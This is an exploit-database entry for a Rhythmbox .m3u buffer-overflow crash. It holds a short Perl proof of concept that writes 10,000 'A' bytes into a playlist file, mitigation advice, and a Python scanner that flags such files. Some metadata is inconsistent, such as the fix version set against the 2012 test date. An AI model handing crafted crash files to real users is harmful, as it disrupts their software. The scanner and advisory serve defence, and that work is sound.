Vendor: Rhythmbox
By: Caddy-Dz
CVSS: 7.5 HIGH
Local Crash
CWE: 119
Product Name: Rhythmbox
Affected Version From: All versions prior to 3.4.2
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: a:gnome:rhythmbox
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Ubuntu 10.10
2012

Rhythmbox (.m3u) Local Crash Poc

A buffer overflow vulnerability exists in Rhythmbox, which is a music player for GNOME. The vulnerability is triggered when a specially crafted .m3u file is opened, resulting in a crash of the application. This vulnerability affects all versions of Rhythmbox prior to 3.4.2.

Mitigation:

Upgrade to the latest version of Rhythmbox (3.4.2) to mitigate this vulnerability.
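
A defender-side triage check for the file shape described above, as an added example that is not part of the original entry or of Rhythmbox: it flags playlist files whose lines are far longer than any real path or URL, or that consist of one repeated byte. The 4096-byte limit, the 64-byte filler threshold and the function names are assumptions, and the sample inputs are constructed.

```python
import os

MAX_ENTRY_BYTES = 4096   # assumed limit (Linux PATH_MAX); not from the page
MIN_FILLER_RUN = 64      # assumed: shortest single-byte run worth flagging


def screen_m3u(data, max_entry=MAX_ENTRY_BYTES):
    """Return findings for one playlist's raw bytes; empty list means clean."""
    findings = []
    if b"\x00" in data:
        findings.append("NUL byte in playlist")
    for lineno, line in enumerate(data.splitlines(), 1):
        entry = line.strip()
        if len(entry) > max_entry:
            findings.append(f"line {lineno}: {len(entry)} bytes (limit {max_entry})")
        if len(entry) >= MIN_FILLER_RUN and len(set(entry)) == 1:
            findings.append(f"line {lineno}: single repeated byte 0x{entry[0]:02x}")
    return findings


def scan_tree(root):
    """Map each flagged .m3u/.m3u8 file under root to its findings."""
    flagged = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            # Extension match is case-insensitive: the PoC writes ".M3U".
            if not name.lower().endswith((".m3u", ".m3u8")):
                continue
            path = os.path.join(dirpath, name)
            try:
                with open(path, "rb") as fh:
                    findings = screen_m3u(fh.read())
            except OSError as exc:
                findings = [f"unreadable: {exc}"]
            if findings:
                flagged[path] = findings
    return flagged


# Constructed samples: a normal extended playlist and a filler-only file
# shaped like the one the PoC writes (10000 x 0x41, no newline).
BENIGN = b"#EXTM3U\n#EXTINF:215,Artist - Title\n/home/user/Music/track01.ogg\n"
FILLER = b"\x41" * 10000

if __name__ == "__main__":
    import sys
    for path, findings in scan_tree(sys.argv[1] if len(sys.argv) > 1 else ".").items():
        print(path, *findings, sep="\n  ")
```

Run it against a download or shared-media directory on hosts that cannot yet be upgraded; a hit is a reason to quarantine the file, not proof of malicious intent.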

Exploit-DB raw data:

####
# Exploit Title: Rhythmbox (.m3u) Local Crash Poc
# Vendor: http://projects.gnome.org/rhythmbox/
# Author: Caddy-Dz
# Facebook Page: www.facebook.com/islam.caddy
# E-mail: islam_babia@hotmail.com  |  Caddy-Dz@exploit-id.com
# Website: www.exploit-id.com
# Category:: webapps
# Tested on: [Ubuntu 10.10 - French]
####

# Note: Rhythmbox is already installed on Ubuntu
# Applications => Sound & Video => Rhythmbox Music Player



#!/usr/bin/perl

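# Build 10000 bytes of 0x41 ("A") as the playlist content.
my $bof="\x41" x 10000;
# Append the buffer to the playlist file; stop if it cannot be opened.
open (my $fh, '>>', 'Caddy-Dz.M3U') or die "Cannot open Caddy-Dz.M3U: $!";
print $fh $bof;
close ($fh);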


####

[+] Peace From Algeria

####

=================================**Algerians Hackers**=======================================|
# Greets To :                                                                                |
  KedAns-Dz , Kalashinkov3 & **All Algerians Hackers** , jos_ali_joe , Z190T ,               |
  All Exploit-Id Team , (exploit-id.com) , (1337day.com) , (09exploit.com) ,                 |
  All My Friends: T!riRou , ChoK0 , MeRdaw! , CaRras0 , StiffLer , MaaTar , St0fa , Nissou , | 
  RmZ ...others                                                                              |
============================================================================================ |